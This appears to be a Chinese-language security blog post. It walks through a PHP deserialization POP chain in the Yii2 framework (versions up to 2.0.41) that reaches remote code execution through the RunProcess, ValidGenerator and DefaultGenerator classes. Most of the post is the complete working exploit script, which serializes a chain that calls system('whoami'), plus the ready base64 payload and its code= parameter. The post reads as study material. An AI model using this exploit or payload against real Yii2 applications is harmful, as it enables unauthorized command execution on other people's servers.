前言:鞏固POP鏈
影響版本:yii2 version <= 2.0.41
搭建的時候注意出現 Unable to verify your data submission,只需要在對應的控制器下填上public $enableCsrfValidation=false;,關閉CSRF驗證即可
翻看了下__destruct,能夠利用的好像也就只有RunProcess類了,其他類基本都給設定了__wakeup來限制反序列化
跟進stopProcess函數,如下所示,$this->processes可控,那么也就是$process可控,從而$process->isRunning()可以調用任意類的__call方法
找到一個__call的方法滿足我們的需求,ValidGenerator類中的__call方法,可以看到 $this->generator $this->validator $this->maxRetries變量都可以控制,如果$res可以控制的話那么就可以執行命令了
通過這條$res = call_user_func_array([$this->generator, $name], $arguments);,我們再找一個__call方法來返回值給$res那么就可以了,這里找的是DefaultGenerator類
構造EXP:
首先用到的第一個類是RunProcess,命名空間是在Codeception\Extension中,且$this->processes可控,內容需要放一個ValidGenerator對象,ValidGenerator對象的構造參數也需要控制
namespace Codeception\Extension;
use Faker\ValidGenerator;
class RunProcess{
private $processes = [];
function __construct($command,$argv)
{
$this->processes[] = new ValidGenerator($command,$argv);
}
}
第二個則是ValidGenerator,DefaultGenerator類,該類的命名空間處於Faker中,且其中的三個屬性都需要控制,$this->generator需要DefaultGenerator類的對象,DefaultGenerator對象的構造參數為要執行的命令
namespace Faker;
class DefaultGenerator{
protected $default ;
function __construct($argv)
{
$this->default = $argv;
}
}
class ValidGenerator{
protected $generator;
protected $validator;
protected $maxRetries;
function __construct($command,$argv)
{
$this->generator = new DefaultGenerator($argv);
$this->validator = $command;
$this->maxRetries = 99999999;
}
}
最終的EXP如下:
<?php
namespace Faker;
class DefaultGenerator{
protected $default ;
function __construct($argv)
{
$this->default = $argv;
}
}
class ValidGenerator{
protected $generator;
protected $validator;
protected $maxRetries;
function __construct($command,$argv)
{
$this->generator = new DefaultGenerator($argv);
$this->validator = $command;
$this->maxRetries = 99999999;
}
}
namespace Codeception\Extension;
use Faker\ValidGenerator;
class RunProcess{
private $processes = [];
function __construct($command,$argv)
{
$this->processes[] = new ValidGenerator($command,$argv);
}
}
$exp = new RunProcess('system','whoami');
echo(base64_encode(serialize($exp)));
//TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0=
這條POP鏈比較簡單,如下分析:
code=TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0=
分析到這不由得嘆息大佬們還是厲害得,自己去把yii2框架的wakeup和destruct看了下,感覺基本沒有可以利用的了,不知道之后會不會再有。。